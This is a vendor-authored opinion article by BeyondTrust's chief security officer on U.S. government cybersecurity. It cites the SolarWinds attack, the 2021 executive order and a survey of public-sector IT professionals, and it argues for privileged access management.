Government cyber response must evolve to stay ahead of growing threats

Digital transformation and cloud services are being widely embraced by U.S. public sector IT and security teams as they support more agile, productive and cost-effective operations. Modernization can be a great thing, but government agencies must understand how these initiatives can expand an organization’s threat surface and leave solutions, once thought to be highly secure, vulnerable.

Industry-shaking cyberattacks rolled through 2020 and early 2021, exposing the underbelly of our nation’s critical infrastructure. If not appropriately...

READ MORE

Digital transformation and cloud services are being widely embraced by U.S. public sector IT and security teams as they support more agile, productive and cost-effective operations. Modernization can be a great thing, but government agencies must understand how these initiatives can expand an organization’s threat surface and leave solutions, once thought to be highly secure, vulnerable.

Industry-shaking cyberattacks rolled through 2020 and early 2021, exposing the underbelly of our nation’s critical infrastructure. If not appropriately addressed, it foreshadows great peril for U.S. government agencies and citizens. A case in point is the SolarWinds supply chain attack, which according to a New York Times report, impacted over 250 public sector agencies and private organizations.

Under increasing pressure to respond to mounting cyber threats, the White House issued an Executive Order on Improving the Nation’s Cybersecurity on May 12, 2021. Government agencies acknowledged a special responsibility to protect critical systems and the highly sensitive government and citizen information contained therein. Compromise, misuse or disruption of critical systems can jeopardize agency missions, while also causing financial damage, loss of trust, loss of life, and widespread societal consequences.

Understanding the key trends impacting agency cybersecurity

To better understand what keeps public sector infosec professionals up at night, BeyondTrust surveyed 200 senior IT and security professionals within U.S. federal civilian, federal defense, state and local government agencies. The survey respondents were asked about security trends, concerns, threat actors and technology priorities — both now and in the future.

The cybersecurity measures were divided into three groups based upon the Center for Internet Security (CIS) Critical Security Controls list: basic, foundational and organizational. For the basic group, the most important current measure cited was inventorying assets. Inventory and control of hardware assets (74% of respondents) came in at #1, with inventory and control of software assets (56%) at #3. Asset discovery and categorization is usually a necessary first step to securing corporate resources, and eliminating blind spots that could provide a backdoor for attackers, so it makes sense to see these measures at the top. In the #2 spot is maintenance, monitoring and analysis of audit logs (63%), with the majority (53%) expecting it to remain just as important or increase in importance in 1-3 years.

Audit trails help organizations comply with government regulations and other mandates. Monitoring and auditing capabilities provide oversight of user activity, providing alerts to real-time threats, and assisting with forensics. Auditing and monitoring of privileged sessions are particularly important, as these sessions reflect the most sensitive access and most powerful capabilities, with the highest damage potential, if misused

The foundational cybersecurity measures show greater change. The top 3 measures cited as important measures today are data protection (62%), data recovery (62%), and privileged access management (61%), while secure configuration for network devices and secure remote access land in the #4 and #5 spots, respectively.

The report analyzed organizational cybersecurity measures, where the changes were less dramatic. This might reflect the continued value of tried-and-true practices such as penetration testing, security awareness training and incident response.

Public sector security professionals consider PAM a key defense measure

Security professionals, concerned with evolving cyber threats, find unwarranted privileged access as one of the most threatening cyberattack methods. The Cybersecurity Trends in Government 2021 Report lists privileged access management as a top foundational cybersecurity measure.

Regardless of a remote worker’s role or a third-party provider, there are emerging insider threats that must be addressed when privileged access is provided. Without proper privileged access controls, users are vulnerable to privileged attack vectors that are ripe for exploitation. PAM mitigates these risks to identify and protect against misuse and malicious intent.

In detail, PAM enables organizations to control privileged account access across identities, passwords and endpoints to reduce risks. PAM also plays a crucial role in securing emerging government programs of the future. According to the report, 61% of respondents consider PAM extremely or somewhat important today, with 71% expecting PAM to maintain or increase in importance within 1-3 years.

Secure digital transformation is necessary to keep pace with adversaries

Undoubtedly, digital transformation initiatives are important. Many agencies have achieved impactful results from automating manual processes, freeing up time to focus on innovation and mission support. Although mission critical, the acceleration of automation can introduce new security risks and expand the attack landscape. In response, government security leaders have organized resources, looked to expand budgets, and provided updated guidance on best practices to meet these threats.

Almost every cyberattack involves the exploitation of privileges or privileged access—either at the initial point of compromise, or to advance an attack with lateral movement. PAM is integral to secure adoption of today’s digital transformation initiatives across the government, such as: application modernization, cloud adoption, DevOps, edge computing, robotic process automation, and zero trust. Government agencies can protect against threats, achieve compliance and securely support their mission with the appropriate privileged access controls.

Morey Haber is chief security officer at BeyondTrust.